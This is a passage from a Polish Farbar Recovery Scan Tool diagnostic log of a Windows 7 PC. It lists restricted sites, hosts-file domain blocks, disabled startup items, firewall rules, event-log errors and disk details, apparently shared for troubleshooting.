HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\0calories.net -> 0calories.net IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\0cj.net -> 0cj.net IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\0scan.com -> www.0scan.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\1-se.com -> 1-se.com Wykryto więcej niż wyliczono: 11403 witryn. ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:34 - 2015-08-07 11:49 - 00450771 ____R C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 www.007guard.com 127.0.0.1 007guard.com 127.0.0.1 008i.com 127.0.0.1 www.008k.com 127.0.0.1 008k.com 127.0.0.1 www.00hq.com 127.0.0.1 00hq.com 127.0.0.1 010402.com 127.0.0.1 www.032439.com 127.0.0.1 032439.com 127.0.0.1 www.0scan.com 127.0.0.1 0scan.com 127.0.0.1 1000gratisproben.com 127.0.0.1 www.1000gratisproben.com 127.0.0.1 1001namen.com 127.0.0.1 www.1001namen.com 127.0.0.1 100888290cs.com 127.0.0.1 www.100888290cs.com 127.0.0.1 www.100sexlinks.com 127.0.0.1 100sexlinks.com 127.0.0.1 10sek.com 127.0.0.1 www.10sek.com 127.0.0.1 www.1-2005-search.com 127.0.0.1 1-2005-search.com 127.0.0.1 123fporn.info 127.0.0.1 www.123fporn.info 127.0.0.1 123haustiereundmehr.com 127.0.0.1 www.123haustiereundmehr.com 127.0.0.1 123moviedownload.com 127.0.0.1 www.123moviedownload.com Wykryto więcej niż wyliczono: 15463 linii. ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Pyko\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 8.8.8.8 - 8.8.4.4 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\Services: LiveUpdateSvc => 2 MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" MSCONFIG\startupreg: AdobeCS5ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Pyko\AppData\Local\Akamai\netsession_win.exe" MSCONFIG\startupreg: ALLUpdate => c:\program files (x86)\allplayer\allupdate.exe" "sleep MSCONFIG\startupreg: Autodesk Sync => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe MSCONFIG\startupreg: AutoRegisterCerts => "C:\Program Files (x86)\Certum\proCertum CardManager\cryptoCertumScanner.exe" /AUTORUN MSCONFIG\startupreg: BrStsInd00 => C:\Program Files (x86)\BrownyInd\Brother\BrIndicator.exe /AUTORUN MSCONFIG\startupreg: BrStsMon00 => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe /AUTORUN MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun MSCONFIG\startupreg: Raptr => C:\PROGRA~2\Raptr\raptrstub.exe --startup MSCONFIG\startupreg: SDTray => "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe" MSCONFIG\startupreg: SpybotPostWindows10UpgradeReInstall => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe" MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun MSCONFIG\startupreg: SunJavaUpdateSched => MSCONFIG\startupreg: uTorrent => "C:\Users\Pyko\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{8D967482-FF1E-484E-98A9-4976776548B4}] => C:\Users\Pyko\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{B32B5CBE-4D3D-4976-B23E-1230971FEBBA}] => C:\Users\Pyko\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{A3FE43C6-1C7A-4260-BCC9-FF5823B0BC50}] => C:\Users\Pyko\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{EA12F26F-481E-438F-857D-A17A0816A473}] => C:\Users\Pyko\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{B8BF28D5-FAA6-41C6-A6FA-92C4EA0F205B}] => LPort=50248 FirewallRules: [TCP Query User{5A00016F-B7CF-4B66-87E4-EFEE58D7D74F}D:\far cry 4\bin\farcry4.exe] => D:\far cry 4\bin\farcry4.exe FirewallRules: [UDP Query User{09A4E564-A66E-452F-9D0B-0C40025F3FE7}D:\far cry 4\bin\farcry4.exe] => D:\far cry 4\bin\farcry4.exe FirewallRules: [TCP Query User{F7062737-B3F8-4836-8BB0-983DBF117C39}C:\program files (x86)\mozilla firefox\firefox.exe] => C:\program files (x86)\mozilla firefox\firefox.exe FirewallRules: [UDP Query User{F888A2C3-553B-4F76-8A91-666BBE7429FF}C:\program files (x86)\mozilla firefox\firefox.exe] => C:\program files (x86)\mozilla firefox\firefox.exe FirewallRules: [TCP Query User{CECF8024-5D36-4AE4-8629-3353538C8B7F}D:\gta v\gta5.exe] => D:\gta v\gta5.exe FirewallRules: [UDP Query User{9FAAC8DF-51EA-4429-A28F-8F1D76401C2D}D:\gta v\gta5.exe] => D:\gta v\gta5.exe FirewallRules: [{B8046291-1562-4159-8B81-E76942AF95A8}] => C:\Program Files (x86)\Raptr\raptr.exe FirewallRules: [{B7651644-D683-4670-B651-03A7967A0B9F}] => C:\Program Files (x86)\Raptr\raptr.exe FirewallRules: [{ED5977D5-B179-4ABE-BA08-13F7FA906FD9}] => C:\Program Files (x86)\Raptr\raptr_im.exe FirewallRules: [{AA72BEF0-86C4-4554-AC3F-C92EF5635B01}] => C:\Program Files (x86)\Raptr\raptr_im.exe FirewallRules: [VirtualPC-In-UDP-1] => %SystemRoot%\System32\vpc.exe FirewallRules: [VirtualPC-In-UDP-2] => %SystemRoot%\System32\vpc.exe FirewallRules: [VirtualPC-In-TCP-1] => %SystemRoot%\System32\vpc.exe FirewallRules: [TCP Query User{848941C9-6D73-4958-BEE4-7475FA7F7D0B}C:\program files (x86)\java\jre1.8.0_111\bin\jp2launcher.exe] => C:\program files (x86)\java\jre1.8.0_111\bin\jp2launcher.exe FirewallRules: [UDP Query User{D20A9A73-9DC1-416D-8050-50FBA7BBDDBD}C:\program files (x86)\java\jre1.8.0_111\bin\jp2launcher.exe] => C:\program files (x86)\java\jre1.8.0_111\bin\jp2launcher.exe FirewallRules: [TCP Query User{41EAB365-61CE-403E-83EC-81C0E6AE8CE8}C:\users\pyko\appdata\local\akamai\netsession_win.exe] => C:\users\pyko\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{4A2CCF13-F1C8-46D3-9B28-5C91CC7F6051}C:\users\pyko\appdata\local\akamai\netsession_win.exe] => C:\users\pyko\appdata\local\akamai\netsession_win.exe FirewallRules: [TCP Query User{23CBA459-1C5D-4C04-AB3D-9FC9A6091F0B}C:\users\pyko\appdata\local\akamai\netsession_win.exe] => C:\users\pyko\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{3FEB3DEB-13F7-4683-AE45-0BB7BF9F1753}C:\users\pyko\appdata\local\akamai\netsession_win.exe] => C:\users\pyko\appdata\local\akamai\netsession_win.exe FirewallRules: [{4DCA073D-92B9-457D-85A2-6B05FDB9E84C}] => C:\Windows\explorer.exe FirewallRules: [{2CC0B21F-6144-42E6-B498-FE2B2807DAAD}] => C:\Windows\system32\rundll32.exe FirewallRules: [{42539EAB-9FFE-4841-A06B-E9132E3AA499}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{B2CA65AC-F000-440D-9D9A-3AFAD75A6A77}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Punkty Przywracania systemu ========================= 20-01-2017 17:59:02 3DMark 20-01-2017 18:01:31 Removed FARO LS 1.1.501.0 (64bit) 20-01-2017 18:02:16 Removed MSI to redistribute MS VS2005 CRT libraries 20-01-2017 18:03:57 Removed WL Server 24-01-2017 10:31:38 Usunięte The Sims 3 ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: avast! SecureLine TAP Adapter v3 Description: avast! SecureLine TAP Adapter v3 Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: TAP-Windows Provider V9 Service: aswTap Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (01/18/2017 07:30:01 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: Explorer.EXE, wersja: 6.1.7601.17514, sygnatura czasowa: 0x4ce7a144 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.1.7601.18933, sygnatura czasowa: 0x55a6a196 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x000000000004ac04 Identyfikator procesu powodującego błąd: 0x6dc Godzina uruchomienia aplikacji powodującej błąd: 0x01d271b88b7169ab Ścieżka aplikacji powodującej błąd: C:\Windows\Explorer.EXE Ścieżka modułu powodującego błąd: C:\Windows\SYSTEM32\ntdll.dll Identyfikator raportu: 1ecd1465-ddac-11e6-92d7-10bf48722ea6 Error: (01/13/2017 08:29:05 AM) (Source: VSS) (EventID: 8194) (User: ) Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd podczas badania interfejsu IVssWriterCallback. hr = 0x80070005, Odmowa dostępu. . To jest często spowodowane przez niepoprawne ustawienia zabezpieczeń w procesie zapisującym lub żądającym. Operacja: Zbieranie danych modułu zapisującego Kontekst: Identyfikator klasy modułu zapisującego: {e8132975-6f93-4464-a53e-1050253ae220} Nazwa modułu zapisującego: System Writer Identyfikator wystąpienia modułu zapisującego: {10b22725-7fae-4c10-b362-3f43e496d1ae} Error: (01/12/2017 05:58:40 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: ZARZĄDZANIE NT) Description: Nie można usunąć z pamięci ciągów licznika wydajności dla usługi WmiApRpl (WmiApRpl). Pierwszy wpis DWORD w sekcji danych (Data) zawiera kod błędu. Error: (01/12/2017 05:58:40 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: ZARZĄDZANIE NT) Description: Ciągi wydajności w wartości rejestru wydajności są uszkodzone, kiedy proces wykonuje następującą operację na dostawcy licznika rozszerzeń: Performance. Wartość BaseIndex z rejestru wydajności to pierwszy wpis DWORD w sekcji danych Data, wartość LastCounter to drugi wpis DWORD, a wartość LastHelp to trzeci wpis DWORD w sekcji Data. Error: (01/12/2017 05:58:40 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: ZARZĄDZANIE NT) Description: Ciągi wydajności w wartości rejestru wydajności są uszkodzone, kiedy proces wykonuje następującą operację na dostawcy licznika rozszerzeń: Performance. Wartość BaseIndex z rejestru wydajności to pierwszy wpis DWORD w sekcji danych Data, wartość LastCounter to drugi wpis DWORD, a wartość LastHelp to trzeci wpis DWORD w sekcji Data. Error: (01/10/2017 07:54:17 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: WSCommCntr4.exe, wersja: 4.0.3.0, sygnatura czasowa: 0x50dcb523 Nazwa modułu powodującego błąd: WSCommCntr4.exe, wersja: 4.0.3.0, sygnatura czasowa: 0x50dcb523 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000000000016490 Identyfikator procesu powodującego błąd: 0x1200 Godzina uruchomienia aplikacji powodującej błąd: 0x01d26b728e9b09db Ścieżka aplikacji powodującej błąd: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\lib\WSCommCntr4.exe Ścieżka modułu powodującego błąd: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\lib\WSCommCntr4.exe Identyfikator raportu: 2f3bbfc0-d766-11e6-b061-10bf48722ea6 Error: (01/10/2017 04:24:11 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: WSCommCntr4.exe, wersja: 4.0.3.0, sygnatura czasowa: 0x50dcb523 Nazwa modułu powodującego błąd: WSCommCntr4.exe, wersja: 4.0.3.0, sygnatura czasowa: 0x50dcb523 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000000000016490 Identyfikator procesu powodującego błąd: 0x380 Godzina uruchomienia aplikacji powodującej błąd: 0x01d26b53d91c1a08 Ścieżka aplikacji powodującej błąd: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\lib\WSCommCntr4.exe Ścieżka modułu powodującego błąd: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\lib\WSCommCntr4.exe Identyfikator raportu: d577453e-d748-11e6-b061-10bf48722ea6 Error: (01/10/2017 03:54:35 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: WSCommCntr4.exe, wersja: 4.0.3.0, sygnatura czasowa: 0x50dcb523 Nazwa modułu powodującego błąd: WSCommCntr4.exe, wersja: 4.0.3.0, sygnatura czasowa: 0x50dcb523 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000000000016490 Identyfikator procesu powodującego błąd: 0xf70 Godzina uruchomienia aplikacji powodującej błąd: 0x01d26b501846dd87 Ścieżka aplikacji powodującej błąd: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\lib\WSCommCntr4.exe Ścieżka modułu powodującego błąd: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\lib\WSCommCntr4.exe Identyfikator raportu: b2ded0b8-d744-11e6-b061-10bf48722ea6 Error: (01/09/2017 12:49:57 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: WSCommCntr4.exe, wersja: 4.0.3.0, sygnatura czasowa: 0x50dcb523 Nazwa modułu powodującego błąd: WSCommCntr4.exe, wersja: 4.0.3.0, sygnatura czasowa: 0x50dcb523 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000000000016490 Identyfikator procesu powodującego błąd: 0x444 Godzina uruchomienia aplikacji powodującej błąd: 0x01d26a6ab8be81b4 Ścieżka aplikacji powodującej błąd: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\lib\WSCommCntr4.exe Ścieżka modułu powodującego błąd: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\lib\WSCommCntr4.exe Identyfikator raportu: bdbe6dd5-d661-11e6-9d97-10bf48722ea6 Error: (01/08/2017 11:22:04 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: Pyko-Komputer) Description: Nie można usunąć z pamięci ciągów licznika wydajności dla usługi ASP.NET (ASP.NET). Pierwszy wpis DWORD w sekcji danych (Data) zawiera kod błędu. Dziennik System: ============= Error: (01/24/2017 12:34:06 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (01/24/2017 12:34:06 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (01/24/2017 12:34:05 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (01/24/2017 12:34:05 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (01/24/2017 12:34:04 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (01/24/2017 12:34:04 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (01/24/2017 12:34:04 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (01/24/2017 12:34:03 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (01/24/2017 12:34:03 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (01/24/2017 12:34:02 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. CodeIntegrity: =================================== Date: 2016-09-09 16:51:28.324 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atikmdag.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-09 16:51:28.277 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atikmpag.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-09 16:51:28.230 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\vpcvmm.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-09 16:51:21.928 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswKbd.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-09 16:51:21.710 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswSnx.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-09 09:28:54.558 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atikmdag.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-09 09:28:54.402 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atikmpag.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-09 09:28:54.340 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\vpcvmm.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-09 09:28:47.881 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswKbd.sys because the set of per-page image hashes could not be found on the system. Date: 2016-09-09 09:28:47.522 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswSnx.sys because the set of per-page image hashes could not be found on the system. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz Procent pamięci w użyciu: 35% Całkowita pamięć fizyczna: 8066.19 MB Dostępna pamięć fizyczna: 5227.41 MB Całkowita pamięć wirtualna: 24064.39 MB Dostępna pamięć wirtualna: 20938.88 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:443.13 GB) (Free:108.3 GB) NTFS Drive d: () (Fixed) (Total:488.28 GB) (Free:185.56 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 97BEA7C5) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=443.1 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=488.3 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================